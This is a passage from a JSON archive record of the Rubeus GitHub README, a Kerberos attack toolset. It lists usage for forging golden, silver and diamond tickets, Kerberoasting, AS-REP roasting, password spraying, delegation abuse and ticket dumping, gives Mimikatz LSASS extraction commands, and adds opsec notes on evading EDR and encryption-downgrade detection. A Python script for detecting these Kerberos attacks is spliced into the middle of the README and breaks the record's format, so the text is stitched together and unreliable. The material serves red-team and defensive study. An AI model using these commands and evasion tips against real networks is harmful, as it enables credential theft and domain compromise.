{
	"id": "97da071e-029f-411a-986f-4b59ea2566f3",
	"created_at": "2026-04-06T00:21:54.652093Z",
	"updated_at": "2026-04-10T03:22:13.860296Z",
	"deleted_at": null,
	"sha1_hash": "247dc916edbfc235152ec68294b5afea53f9b147",
	"title": "GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 620821,
	"plain_text": "GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.\r\nBy 0xe7\r\nArchived: 2026-04-05 14:03:43 UTC\r\nRubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpy's\r\nKekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUX's MakeMeEnterpriseAdmin project (GPL v3.0\r\nlicense). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization-without their prior work this project would not exist.\r\nCharlie Clark and Ceri Coburn have both made significant contributions as co-developers to the Rubeus codebase.\r\nElad Shamir contributed some essential work for resource-based constrained delegation. Their work is very\r\nappreciated!\r\nRubeus also uses a C# ASN.1 parsing/encoding library from Thomas Pornin named DDer that was released with\r\nan \"MIT-like\" license. Huge thanks to Thomas for his clean and stable code!\r\nPKINIT code heavily adapted from @SteveSyfuhs's Bruce tool. Bruce made RFC4556 (PKINIT) a lot easier to\r\nunderstand. 
Huge thanks to Steve!\r\nNDR encoding and decoding for Kerberos PAC is based on the NtApiDotNet library from @tiraniddo, thank you\r\nJames.\r\nThe KerberosRequestorSecurityToken.GetRequest method for Kerberoasting was contributed to PowerView (and\r\nthen incorporated into Rubeus) by @machosec.\r\n@harmj0y is the primary author of this code base.\r\nRubeus is licensed under the BSD 3-Clause license.\r\nTable of Contents\r\nRubeus\r\nTable of Contents\r\nBackground\r\nCommand Line Usage\r\nOpsec Notes\r\nOverview\r\nWeaponization\r\nExample: Credential Extraction\r\nExample: Over-pass-the-hash\r\nTicket requests and renewals\r\nasktgt\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 1 of 100\n\nasktgs\r\nrenew\r\nbrute|spray\r\nConstrained delegation abuse\r\ns4u\r\nTicket Forgery\r\ngolden\r\nsilver\r\ndiamond\r\nTicket Management\r\nptt\r\npurge\r\ndescribe\r\nTicket Extraction and Harvesting\r\ntriage\r\nklist\r\ndump\r\ntgtdeleg\r\nmonitor\r\nharvest\r\nRoasting\r\nkerberoast\r\nkerberoasting opsec\r\nExamples\r\nasreproast\r\nMiscellaneous\r\ncreatenetonly\r\nchangepw\r\nhash\r\ntgssub\r\ncurrentluid\r\nlogonsession\r\nasrep2kirbi\r\nkirbi\r\nCompile Instructions\r\nTargeting other .NET versions\r\nSidenote: Building Rubeus as a Library\r\nSidenote: Running Rubeus Through PowerShell\r\nSidenote Sidenote: Running Rubeus Over PSRemoting\r\nBackground\r\nCommand Line Usage\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.3.3\r\n Ticket requests and renewals:\r\n Retrieve a TGT based on a user password/hash, optionally saving to a file or applying to the current logon s\r\n Rubeus.exe asktgt /user:USER \u003c/password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HAS\r\n Retrieve a TGT based on a user password/hash, start a /netonly process, and apply the ticket to the new p\r\n Rubeus.exe asktgt /user:USER \u003c/password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HAS\r\n Retrieve a TGT using a PKCS12 certificate, start a /netonly process, and apply the ticket to the new proc\r\n Rubeus.exe asktgt /user:USER /certificate:C:\\temp\\leaked.pfx \u003c/password:STOREPASSWORD\u003e /createnetonly:C:\r\n Retrieve a TGT using a certificate from the user's keystore (Smartcard) specifying certificate thumbprint or\r\n Rubeus.exe asktgt /user:USER /certificate:f063e6f4798af085946be6cd9d82ba3999c7ebac /createnetonly:C:\\Win\r\n Retrieve a TGT suitable for changing an account with an expired password using the changepw command:\r\n Rubeus.exe asktgt /user:USER \u003c/password:PASSWORD /changepw [/enctype:DES|RC4|AES128|AES256] | /des:HASH\r\n Request a TGT without sending pre-auth data:\r\n Rubeus.exe asktgt /user:USER [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid]\r\n Request a service ticket using an AS-REQ:\r\n Rubeus.exe asktgt /user:USER /service:SPN \u003c/password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HA\r\n Retrieve a service ticket for one or more SPNs, optionally saving or applying the ticket:\r\n Rubeus.exe asktgs \u003c/ticket:BASE64 | /ticket:FILE.KIRBI\u003e \u003c/service:SPN1,SPN2,...\u003e [/enctype:DES|RC4|AES12\r\n Retrieve a service ticket using the Kerberos Key List Request options:\r\n Rubeus.exe asktgs /keyList /service:KRBTGT_SPN \u003c/ticket:BASE64 | /ticket:FILE.KIRBI\u003e [/enctype:DES|RC4|\r\n Retrieve a delegated managed service account ticket:\r\n Rubeus.exe asktgs /dmsa /opsec /service:KRBTGT_SPN /targetuser:DMSA_ACCOUNT$ \u003c/ticket:BASE64 | /ticket:\r\n Renew a TGT, optionally applying the ticket, saving it, or auto-renewing the ticket up to its renew-till lim\r\n Rubeus.exe renew \u003c/ticket:BASE64 | /ticket:FILE.KIRBI\u003e [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt\r\n Perform a Kerberos-based password bruteforcing attack:\r\n Rubeus.exe brute \u003c/password:PASSWORD | /passwords:PASSWORDS_FILE\u003e [/user:USER | /users:USERS_FILE] [/dom\r\n Perform a scan for accounts that do not require pre-authentication:\r\n Rubeus.exe preauthscan /users:C:\\temp\\users.txt [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/proxyurl:http\r\n Constrained delegation abuse:\r\n Perform S4U constrained delegation abuse:\r\n Rubeus.exe s4u \u003c/ticket:BASE64 | /ticket:FILE.KIRBI\u003e \u003c/impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KI\r\n Rubeus.exe s4u /user:USER \u003c/rc4:HASH | /aes256:HASH\u003e [/domain:DOMAIN] \u003c/impersonateuser:USER | /tgs:BASE\r\n Perform S4U constrained delegation abuse across domains:\r\n Rubeus.exe s4u /user:USER \u003c/rc4:HASH | /aes256:HASH\u003e [/domain:DOMAIN] \u003c/impersonateuser:USER | /tgs:BASE\r\n Ticket Forgery:\r\n Forge a golden ticket using LDAP to gather the relevant information:\r\n Rubeus.exe golden \u003c/des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH\u003e \u003c/user:USERNAME\u003e /ldap [/printcm\r\n Forge a golden ticket using LDAP to gather the relevant information but explicitly overriding some values:\r\n Rubeus.exe golden \u003c/des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH\u003e \u003c/user:USERNAME\u003e /ldap [/dc:DOMA\r\n Forge a golden ticket, setting values explicitly:\r\n Rubeus.exe golden \u003c/des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH\u003e \u003c/user:USERNAME\u003e \u003c/domain:DOMAIN\r\n Forge a silver ticket using LDAP to gather the relevant information:\r\n Rubeus.exe silver \u003c/des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH\u003e \u003c/user:USERNAME\u003e \u003c/service:SPN\u003e\r\n Forge a silver ticket 
using LDAP to gather the relevant information, using the KRBTGT key to calculate the K\r\n Rubeus.exe silver \u003c/des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH\u003e \u003c/user:USERNAME\u003e \u003c/service:SPN\u003e\r\n Forge a silver ticket using LDAP to gather the relevant information but explicitly overriding some values:\r\n Rubeus.exe silver \u003c/des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH\u003e \u003c/user:USERNAME\u003e \u003c/service:SPN\u003e\r\n Forge a silver ticket using LDAP to gather the relevant information and including an S4U Delegation Info PAC\r\n Rubeus.exe silver \u003c/des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH\u003e \u003c/user:USERNAME\u003e \u003c/service:SPN\u003e\r\n Forge a silver ticket using LDAP to gather the relevant information and setting a different cname and crealm\r\n Rubeus.exe silver \u003c/des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH\u003e \u003c/user:USERNAME\u003e \u003c/service:SPN\u003e\r\n Forge a silver ticket, setting values explicitly:\r\n Rubeus.exe silver \u003c/des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH\u003e \u003c/user:USERNAME\u003e \u003c/service:SPN\u003e\r\n Forge a diamond TGT by requesting a TGT based on a user password/hash:\r\n Rubeus.exe diamond /user:USER \u003c/password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH\r\n Forge a diamond TGT by requesting a TGT using a PKCS12 certificate:\r\n Rubeus.exe diamond /user:USER /certificate:C:\\temp\\leaked.pfx \u003c/password:STOREPASSWORD\u003e [/crea\r\n Forge a diamond TGT by requesting a TGT using tgtdeleg:\r\n Rubeus.exe diamond /tgtdeleg [/createnetonly:C:\\Windows\\System32\\cmd.exe] [/outfile:FILENAME]\r\n Ticket management:\r\n Submit a TGT, optionally targeting a specific LUID (if elevated):\r\n Rubeus.exe ptt \u003c/ticket:BASE64 | /ticket:FILE.KIRBI\u003e [/luid:LOGINID]\r\n Purge tickets from the current logon session, optionally targeting a specific 
LUID (if elevated):\r\n Rubeus.exe purge [/luid:LOGINID]\r\n Parse and describe a ticket (service ticket or TGT):\r\n Rubeus.exe describe \u003c/ticket:BASE64 | /ticket:FILE.KIRBI\u003e [/servicekey:HASH] [/krbkey:HASH] [/asrepkey:H\r\n Ticket extraction and harvesting:\r\n Triage all current tickets (if elevated, list for all users), optionally targeting a specific LUID, username\r\n Rubeus.exe triage [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM]\r\n List all current tickets in detail (if elevated, list for all users), optionally targeting a specific LUID:\r\n Rubeus.exe klist [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM]\r\n Dump all current ticket data (if elevated, dump for all users), optionally targeting a specific service/LUID\r\n Rubeus.exe dump [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM] [/nowrap]\r\n Retrieve a usable TGT .kirbi for the current user (w/ session key) without elevation by abusing the Kerberos\r\n Rubeus.exe tgtdeleg [/target:SPN]\r\n Monitor every /interval SECONDS (default 60) for new TGTs:\r\n Rubeus.exe monitor [/interval:SECONDS] [/targetuser:USER] [/nowrap] [/registry:SOFTWARENAME] [/runfor:SE\r\n Monitor every /monitorinterval SECONDS (default 60) for new TGTs, auto-renew TGTs, and display the working c\r\n Rubeus.exe harvest [/monitorinterval:SECONDS] [/displayinterval:SECONDS] [/targetuser:USER] [/nowrap] [/\r\n Roasting:\r\n Perform Kerberoasting:\r\n Rubeus.exe kerberoast [[/spn:\"blah/blah\"] | [/spns:C:\\temp\\spns.txt]] [/user:USER] [/domain:DOMAIN] [/dc\r\n Perform Kerberoasting, outputting hashes to a file:\r\n Rubeus.exe kerberoast /outfile:hashes.txt [[/spn:\"blah/blah\"] | [/spns:C:\\temp\\spns.txt]] [/user:USER] [\r\n Perform Kerberoasting, outputting hashes in the file output format, but to the console:\r\n Rubeus.exe kerberoast /simple [[/spn:\"blah/blah\"] | 
[/spns:C:\\temp\\spns.txt]] [/user:USER] [/domain:DOMA\r\n Perform Kerberoasting with alternate credentials:\r\n Rubeus.exe kerberoast /creduser:DOMAIN.FQDN\\USER /credpassword:PASSWORD [/spn:\"blah/blah\"] [/user:USER]\r\n Perform Kerberoasting with an existing TGT:\r\n Rubeus.exe kerberoast \u003c/spn:\"blah/blah\" | /spns:C:\\temp\\spns.txt\u003e \u003c/ticket:BASE64 | /ticket:FILE.KIRBI\u003e\r\n Perform Kerberoasting with an existing TGT using an enterprise principal:\r\n Rubeus.exe kerberoast \u003c/spn:user@domain.com | /spns:user1@domain.com,user2@domain.com\u003e /enterprise \u003c/tic\r\n Perform Kerberoasting with an existing TGT and automatically retry with the enterprise principal if any fail\r\n Rubeus.exe kerberoast \u003c/ticket:BASE64 | /ticket:FILE.KIRBI\u003e /autoenterprise [/ldaps] [/nowrap]\r\n Perform Kerberoasting using the tgtdeleg ticket to request service tickets - requests RC4 for AES accounts:\r\n Rubeus.exe kerberoast /usetgtdeleg [/ldaps] [/nowrap]\r\n Perform \"opsec\" Kerberoasting, using tgtdeleg, and filtering out AES-enabled accounts:\r\n Rubeus.exe kerberoast /rc4opsec [/ldaps] [/nowrap]\r\n List statistics about found Kerberoastable accounts without actually sending ticket requests:\r\n Rubeus.exe kerberoast /stats [/ldaps] [/nowrap]\r\n Perform Kerberoasting, requesting tickets only for accounts with an admin count of 1 (custom LDAP filter):\r\n Rubeus.exe kerberoast /ldapfilter:'admincount=1' [/ldaps] [/nowrap]\r\n Perform Kerberoasting, requesting tickets only for accounts whose password was last set between 01-31-2005 a\r\n Rubeus.exe kerberoast /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:5 [/ldaps] [/nowrap]\r\n Perform Kerberoasting, with a delay of 5000 milliseconds and a jitter of 30%:\r\n Rubeus.exe kerberoast /delay:5000 /jitter:30 [/ldaps] [/nowrap]\r\n Perform AES Kerberoasting:\r\n Rubeus.exe kerberoast /aes [/ldaps] [/nowrap]\r\n Perform Kerberoasting using an account without pre-auth by sending 
AS-REQ's:\r\n Rubeus.exe kerberoast \u003c/spn:\"\"blah/blah\"\" | /spns:C:\\temp\\spns.txt\u003e /nopreauth:USER /domain:DOMAIN [/dc:\r\n Perform AS-REP \"roasting\" for any users without preauth:\r\n Rubeus.exe asreproast [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:\"OU=,...\"] [/ldaps] [/d\r\n Perform AS-REP \"roasting\" for any users without preauth, outputting Hashcat format to a file:\r\n Rubeus.exe asreproast /outfile:hashes.txt /format:hashcat [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONT\r\n Perform AS-REP \"roasting\" for any users without preauth using alternate credentials:\r\n Rubeus.exe asreproast /creduser:DOMAIN.FQDN\\USER /credpassword:PASSWORD [/user:USER] [/domain:DOMAIN] [/\r\n Miscellaneous:\r\n Create a hidden program (unless /show is passed) with random /netonly credentials, displaying the PID and LU\r\n Rubeus.exe createnetonly /program:\"C:\\Windows\\System32\\cmd.exe\" [/show] [/ticket:BASE64 | /ticket:FILE.K\r\n Reset a user's password from a supplied TGT (AoratoPw):\r\n Rubeus.exe changepw \u003c/ticket:BASE64 | /ticket:FILE.KIRBI\u003e /new:PASSWORD [/dc:DOMAIN_CONTROLLER] [/target\r\n Calculate rc4_hmac, aes128_cts_hmac_sha1, aes256_cts_hmac_sha1, and des_cbc_md5 hashes:\r\n Rubeus.exe hash /password:X [/user:USER] [/domain:DOMAIN]\r\n Substitute an sname or SPN into an existing service ticket:\r\n Rubeus.exe tgssub \u003c/ticket:BASE64 | /ticket:FILE.KIRBI\u003e /altservice:ldap [/srealm:DOMAIN] [/ptt] [/luid]\r\n Rubeus.exe tgssub \u003c/ticket:BASE64 | /ticket:FILE.KIRBI\u003e /altservice:cifs/computer.domain.com [/srealm:DO\r\n Display the current user's LUID:\r\n Rubeus.exe currentluid\r\n Display information about the (current) or (target) logon session, default all readable:\r\n Rubeus.exe logonsession [/current] [/luid:X]\r\n The \"/consoleoutfile:C:\\FILE.txt\" argument redirects all console output to the file specified.\r\n The \"/nowrap\" flag prevents 
any base64 ticket blobs from being column wrapped for any function.\r\n The \"/debug\" flag outputs ASN.1 debugging information.\r\n Convert an AS-REP and a key to a Kirbi:\r\n Rubeus.exe asrep2kirbi /asrep:\u003cBASE64 | FILEPATH\u003e \u003c/key:BASE64 | /keyhex:HEXSTRING\u003e [/enctype:DES|RC4|AE\r\n Insert a new session key into a Kirbi:\r\n Rubeus.exe kirbi /kirbi:\u003cBASE64 | FILEPATH\u003e /sessionkey:SESSIONKEY /sessionetype:DES|RC4|AES128|AES256 [\r\n NOTE: Base64 ticket blobs can be decoded with:\r\n [IO.File]::WriteAllBytes(\"ticket.kirbi\", [Convert]::FromBase64String(\"aa...\"))\r\nOpsec Notes\r\nThis section covers some notes on the operational security of using Rubeus in an environment, with some\r\ntechnical examples comparing/contrasting some of its approaches to Mimikatz. The material here will be\r\nexpanded in the future.\r\nOverview\r\nAny action you perform on a system is a detectable risk, especially when abusing functionality in\r\n\"weird\"/unintended ways. Rubeus (like any attacker toolset) can be detected in a number of ways, either from\r\nthe host, network, or domain perspective. I have a workmate who is fond of stating \"everything is stealthy until\r\nsomeone is looking for it\" - tools and techniques generally evade detection because either a) people are not\r\nsufficiently aware of the tool/technique and therefore not even looking, b) people cannot collect and process the\r\ndata needed at the appropriate scale, or c) the tool/technique blends with existing behavior sufficiently to sneak in\r\namong the false positives in an environment. 
There is much more information on these steps and detection subversion in\r\ngeneral in Matt Graeber and Lee Christensen’s Black Hat USA 2018 “Subverting Sysmon” talk and associated\r\nwhitepaper.\r\nFrom the host perspective, Rubeus can be caught during initial weaponization of the code itself, by an abnormal\r\n(non-lsass.exe) process issuing raw Kerberos port 88 traffic, through the use of sensitive APIs like\r\nLsaCallAuthenticationPackage(), or by abnormal tickets being present on the host (e.g. rc4_hmac use in tickets in\r\na modern environment).\r\nFrom a network or domain controller log perspective, since Rubeus implements many parts of the normal\r\nKerberos protocol, the main detection method involves the use of rc4_hmac in Kerberos exchanges. Modern\r\nWindows domains (functional level 2008 and above) use AES encryption by default in normal Kerberos\r\nexchanges (with a few exceptions like inter-realm trust tickets). Using an rc4_hmac (NTLM) key in a\r\nKerberos exchange instead of an aes256_cts_hmac_sha1 (or aes128) key therefore produces a signal that is detectable at\r\nthe host level, the network level (if Kerberos traffic is parsed), and the domain controller event log level (the\r\nticket encryption type is recorded in events 4768 and 4769); this is sometimes known as \"encryption downgrade\".\r\nWeaponization\r\nOne common way attack tools are detected is through the weaponization vector for the code. If Rubeus is run\r\nthrough PowerShell (this includes Empire) the standard PowerShell V5 protections all apply (deep script block\r\nlogging, AMSI, etc.). If Rubeus is executed as a binary on disk, standard AV signature detection comes into play\r\n(part of why we do not release compiled versions of Rubeus, as brittle signatures are silly ; ). If Rubeus is used as\r\na library then it's susceptible to whatever method the primary tool uses to get running. 
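The host, network and domain controller signals described under Overview can be checked mechanically. The Python below is an added example and is not part of Rubeus or of this README. It runs three of the checks just described over a handful of constructed Windows Security event records (4768 TGT requests and 4769 service ticket requests, reduced to the fields the logic needs): a ticket encryption type of rc4_hmac or DES where the account that owns the key is not on a known-legacy allowlist (the encryption downgrade signal), a 4768 accepted with PreAuthType 0 (an AS-REQ without pre-authentication, as asreproast and asktgt /nopreauth send), and a burst of RC4 service ticket requests for several distinct service accounts from one requester and client (the Kerberoasting pattern). The event records, the allowlist and the thresholds are assumptions chosen for the illustration.

```python
# Added example (not part of Rubeus): detection logic for the Kerberos signals
# discussed in the Opsec Notes, run over constructed Windows Security event records.
from collections import defaultdict
from datetime import datetime, timedelta

# TicketEncryptionType values as logged in events 4768/4769.
ETYPE_NAMES = {
    0x01: 'des_cbc_crc', 0x03: 'des_cbc_md5',
    0x11: 'aes128_cts_hmac_sha1', 0x12: 'aes256_cts_hmac_sha1',
    0x17: 'rc4_hmac', 0x18: 'rc4_hmac_exp',
}
DOWNGRADE_ETYPES = {0x01, 0x03, 0x17, 0x18}   # anything weaker than AES
RC4_ETYPES = {0x17, 0x18}

# Assumed allowlist of accounts known to still need RC4 (tune per environment).
KNOWN_LEGACY_ACCOUNTS = {'legacyapp$'}

# Constructed sample events, reduced to the fields the checks need.
# 4768: 'account' is the TGT requester, 'preauth' the PreAuthType field.
# 4769: 'account' is the requester, 'service' the ServiceName (target account).
SAMPLE_EVENTS = [
    {'id': 4768, 'time': '2024-03-01T09:00:00', 'account': 'dfm.a', 'client': '10.0.0.21', 'etype': 0x12, 'preauth': 2},
    {'id': 4768, 'time': '2024-03-01T09:00:05', 'account': 'dfm.a', 'client': '10.0.0.21', 'etype': 0x17, 'preauth': 2},
    {'id': 4768, 'time': '2024-03-01T09:01:00', 'account': 'svc_noauth', 'client': '10.0.0.21', 'etype': 0x17, 'preauth': 0},
    {'id': 4769, 'time': '2024-03-01T09:02:00', 'account': 'dfm.a', 'client': '10.0.0.21', 'etype': 0x17, 'service': 'svc_sql'},
    {'id': 4769, 'time': '2024-03-01T09:02:01', 'account': 'dfm.a', 'client': '10.0.0.21', 'etype': 0x17, 'service': 'svc_web'},
    {'id': 4769, 'time': '2024-03-01T09:02:02', 'account': 'dfm.a', 'client': '10.0.0.21', 'etype': 0x17, 'service': 'svc_backup'},
    {'id': 4769, 'time': '2024-03-01T09:30:00', 'account': 'bob', 'client': '10.0.0.50', 'etype': 0x17, 'service': 'legacyapp$'},
    {'id': 4769, 'time': '2024-03-01T09:31:00', 'account': 'dfm.a', 'client': '10.0.0.21', 'etype': 0x12, 'service': 'fs01$'},
]


def parse_time(text):
    return datetime.strptime(text, '%Y-%m-%dT%H:%M:%S')


def detect(events, legacy_accounts=KNOWN_LEGACY_ACCOUNTS,
           window=timedelta(minutes=5), burst=3):
    findings = []
    recent = defaultdict(list)      # (requester, client) -> [(time, service)] for RC4 4769s
    burst_reported = set()
    for e in sorted(events, key=lambda ev: parse_time(ev['time'])):
        when = parse_time(e['time'])
        requester = e['account'].lower()
        # The key owner is the user for a TGT and the service account for a service ticket.
        key_owner = requester if e['id'] == 4768 else e['service'].lower()
        etype = ETYPE_NAMES.get(e['etype'], hex(e['etype']))

        # 1. Encryption downgrade: RC4/DES ticket for an account that should be on AES.
        if e['etype'] in DOWNGRADE_ETYPES and key_owner not in legacy_accounts:
            findings.append({'rule': 'encryption_downgrade', 'event': e['id'],
                             'account': key_owner, 'client': e['client'], 'etype': etype})

        # 2. AS-REQ accepted without pre-authentication (asreproast, asktgt /nopreauth).
        if e['id'] == 4768 and e.get('preauth') == 0:
            findings.append({'rule': 'no_preauth_tgt', 'event': 4768,
                             'account': requester, 'client': e['client'], 'etype': etype})

        # 3. Kerberoast pattern: several RC4 service tickets for distinct service
        #    accounts from one requester/client within a short window.
        if e['id'] == 4769 and e['etype'] in RC4_ETYPES:
            group = (requester, e['client'])
            recent[group] = [(t, s) for t, s in recent[group] if when - t <= window]
            recent[group].append((when, key_owner))
            services = sorted({s for _, s in recent[group]})
            if len(services) >= burst and group not in burst_reported:
                burst_reported.add(group)
                findings.append({'rule': 'kerberoast_burst', 'event': 4769,
                                 'account': requester, 'client': e['client'],
                                 'etype': etype, 'services': services})
    return findings


def summarize(findings):
    counts = defaultdict(int)
    for f in findings:
        counts[f['rule']] += 1
    return dict(counts)


if __name__ == '__main__':
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
    print(summarize(detect(SAMPLE_EVENTS)))
```

On real data, map the 4768/4769 XML fields (TargetUserName, ServiceName, IpAddress, TicketEncryptionType, PreAuthType) onto the same dictionary keys. The per-account allowlist is what keeps the downgrade rule quiet for the legacy exceptions mentioned above; without it, every RC4 ticket for a still-RC4 service would fire.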
And if Rubeus is run\r\nthrough unmanaged assembly execution (like Cobalt Strike's execute_assembly) cross-process code injection is\r\nperformed and the CLR is loaded into a potentially non-.NET process, though this signal is present for the\r\nexecution of any .NET code using this method.\r\nAlso, AMSI (the Antimalware Scan Interface) has been added to .NET 4.8. Ryan Cobb has additional details on\r\nthe offensive implications of this in the Defense section of his “Entering a Covenant: .NET Command and\r\nControl” post.\r\nExample: Credential Extraction\r\nSay we have elevated access on a machine and want to extract user credentials for reuse.\r\nMimikatz is the Swiss Army knife of credential extraction, with multiple options. The sekurlsa::logonpasswords\r\ncommand will open up a read handle to LSASS, enumerate logon sessions present on the system, walk the default\r\nauthentication packages for each logon session, and extract any reversible password/credential material present.\r\nSidenote: the sekurlsa::ekeys command will enumerate ALL key types present for the Kerberos package.\r\nRubeus doesn't have any code to touch LSASS (and none is intended), so its functionality is limited to extracting\r\nKerberos tickets through use of the LsaCallAuthenticationPackage() API. From a non-elevated standpoint, the\r\nsession keys for TGTs are not returned (by default) so only the service tickets extracted will be usable (the tgtdeleg\r\ncommand uses a Kekeo trick to get a usable TGT for the current user). If in a high-integrity context, a GetSystem\r\nequivalent utilizing token duplication is run to elevate to SYSTEM, and a fake logon application is registered with\r\nthe LsaRegisterLogonProcess() API call. 
This allows for privileged enumeration and extraction of all tickets\r\ncurrently registered with LSA on the system, resulting in base64-encoded .kirbi files being output for later reuse.\r\nMimikatz can perform the same base64 .kirbi extraction with the following series of commands:\r\nmimikatz # privilege::debug\r\nmimikatz # token::elevate\r\nmimikatz # standard::base64 /output:true\r\nmimikatz # kerberos::list /export\r\nMimikatz can also carve tickets directly out of LSASS' memory with:\r\nmimikatz # privilege::debug\r\nmimikatz # standard::base64 /output:true\r\nmimikatz # sekurlsa::tickets /export\r\nAs \"everything is stealthy until someone is looking for it\", it's arguable whether LSASS manipulation or ticket\r\nextraction via the LsaCallAuthenticationPackage() API call is more \"stealthy\". Due to Mimikatz' popularity,\r\nopening up a handle to LSASS and reading/writing its memory has become a big target for EDR detection and/or\r\nprevention. However, LsaCallAuthenticationPackage() is used by a fairly limited set of processes, and creating a\r\nfake logon application with LsaRegisterLogonProcess() is also fairly anomalous behavior. That said, full API-level\r\nintrospection and baselining appears to be a more difficult technical problem than LSASS protection.\r\nExample: Over-pass-the-hash\r\nSay we recover a user's rc4_hmac hash (NTLM) and want to reuse this credential to compromise an additional\r\nmachine where the user account has privileged access.\r\nSidenote: pass-the-hash != over-pass-the-hash. The traditional pass-the-hash technique involves reusing a hash\r\nthrough the NTLMv1/NTLMv2 protocol, which doesn't touch Kerberos at all. The over-pass-the-hash approach\r\nwas developed by Benjamin Delpy and Skip Duckwall (see their \"Abusing Microsoft Kerberos - Sorry you guys\r\ndon't get it\" presentation for more information). This approach turns a hash/key (rc4_hmac,\r\naes256_cts_hmac_sha1, etc.) 
for a domain-joined user into a fully-fledged ticket-granting-ticket (TGT).\r\nLet's compare \"over-passing-the-hash\" via Mimikatz' sekurlsa::pth command versus using the asktgt\r\ncommand from Rubeus (or Kekeo if you'd like).\r\nWhen sekurlsa::pth is used to over-pass-the-hash, Mimikatz first creates a new logon type 9 (netonly) process with\r\ndummy credentials - this creates a new \"sacrificial\" logon session that doesn't interact with the current logon\r\nsession. It then opens the LSASS process with the ability to write to process memory, and the supplied hash/key is\r\nthen patched into the appropriate section for the associated logon session (in this case, the \"sacrificial\" logon\r\nsession that was started). This causes the normal Kerberos authentication process to kick off as if the\r\nuser had logged on normally, turning the supplied hash into a fully-fledged TGT.\r\nWhen Rubeus' asktgt command is run (or Kekeo's equivalent), the raw Kerberos protocol is used to request a\r\nTGT, which is then applied to the current logon session if the /ptt flag is passed.\r\nWith the Mimikatz approach, administrative rights are needed as you are manipulating LSASS memory directly.\r\nAs previously mentioned, Mimikatz' popularity has also led to this type of behavior (opening up a handle to\r\nLSASS and reading/writing its memory) being a big target for EDR detection and/or prevention. With the\r\nRubeus/Kekeo approach, administrative rights are not needed as LSASS is not being touched. However, if the\r\nticket is applied to the current logon session (with /ptt), the TGT for the current logon session will be\r\noverwritten. This behavior can be avoided (with administrative access) by using the createnetonly command\r\nto create a sacrificial process/logon session, then using ptt /ticket:X /luid:0xa.. with the newly created\r\nprocess LUID. 
If using Cobalt Strike, using the make_token command with dummy credentials and then\r\nkerberos_ticket_use with the ticket retrieved by Rubeus will let you apply the new TGT in a way that a) doesn't\r\nneed administrative rights and b) doesn't stomp on the current logon session TGT.\r\nIt is our opinion that the LSASS manipulation approach is more likely (at the current moment) to be detected or\r\nmitigated due to the popularity of the technique. However, the Rubeus approach does result in another piece of\r\ndetectable behavior. Kerberos traffic to port 88 should normally only originate from lsass.exe - sending raw traffic\r\nof this type from an abnormal process could be detectable if the information can be gathered.\r\nSidenote: one way both approaches can potentially be caught is the previously mentioned \"encryption\r\ndowngrade\" detection. To retrieve AES keys, use Mimikatz' sekurlsa::ekeys module to return ALL Kerberos\r\nencryption keys (same with lsadump::dcsync), which are better to use when trying to evade some detections.\r\nTicket requests and renewals\r\nBreakdown of the ticket request commands:\r\nCommand Description\r\nasktgt Request a ticket-granting-ticket (TGT) from a hash/key or password\r\nasktgs Request a service ticket from a passed TGT\r\nrenew Renew (or autorenew) a TGT or service ticket\r\nbrute Perform a Kerberos-based password bruteforcing attack. 'spray' can also be used instead of 'brute'\r\npreauthscan Perform a scan for accounts that do not require Kerberos pre-authentication\r\nasktgt\r\nThe asktgt action will build raw AS-REQ (TGT request) traffic for the specified user and encryption key (/rc4,\r\n/aes128, /aes256, or /des). A /password flag can also be used instead of a hash - in this case /enctype:X\r\nwill default to RC4 for the exchange, with des|aes128|aes256 as options. 
If no /domain is specified, the\r\ncomputer's current domain is extracted, and if no /dc is specified the same is done for the system's current\r\ndomain controller. If authentication is successful, the resulting AS-REP is parsed and the KRB-CRED (a .kirbi,\r\nwhich includes the user's TGT) is output as a base64 blob. The /ptt flag will \"pass-the-ticket\" and apply the\r\nresulting Kerberos credential to the current logon session. The /luid:0xA.. flag will apply the ticket to the\r\nspecified logon session ID (elevation needed) instead of the current logon session.\r\nNote that no elevated privileges are needed on the host to request TGTs or apply them to the current logon\r\nsession, just the correct hash for the target user. Also, another opsec note: only one TGT can be applied at a time to\r\nthe current logon session, so when /ptt is used the previous TGT is wiped as the new ticket is applied. A\r\nworkaround is to use the /createnetonly:C:\\X.exe parameter (which hides the process by default\r\nunless the /show flag is specified), or to request the ticket and apply it to another logon session with ptt\r\n/luid:0xA.. 